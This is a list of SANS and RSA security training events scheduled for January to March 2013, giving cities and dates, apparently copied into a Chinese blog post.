SANS Security East 2013  New Orleans, LAUS Jan 16, 2013 - Jan 23, 2013 Live Event
North American SCADA and Process Control Summit 2013 Lake Buena Vista, FLUS Feb 06, 2013 - Feb 15, 2013 Live Event
SANS Delhi 2013 New Delhi, IN Feb 11, 2013 - Feb 22, 2013 Live Event
SANS Scottsdale 2013 Scottsdale, AZUS Feb 17, 2013 - Feb 23, 2013 Live Event
SANS Belgium 2013 Brussels, BE Feb 18, 2013 - Feb 23, 2013 Live Event
RSA Conference 2013 San Francisco, CAUS Feb 24, 2013 - Feb 25, 2013 Live Event
SANS Secure Singapore 2013 Singapore, SG Feb 25, 2013 - Mar 02, 2013 Live Event
SANS South Africa 2013 Johannesburg, ZA Mar 04, 2013 - Mar 09, 2013 Live Event
SANS 2013 Orlando, FLUS Mar 08, 2013 - Mar 15, 2013 Live Event
SEC528: SANS Training Program for the CompTIA New
Advanced Security Practitioner Certification
OnlineDCUS Jan 07, 2013 - Jan 11, 2013 Live Event
SANS OnDemand Books & MP3s OnlyUS Anytime Self Paced
阅读(2887) | 评论(0) | 转发(0) |
0

上一篇:关注

下一篇:The Botnet vs. Malware Relationship

给主人留下些什么吧!~~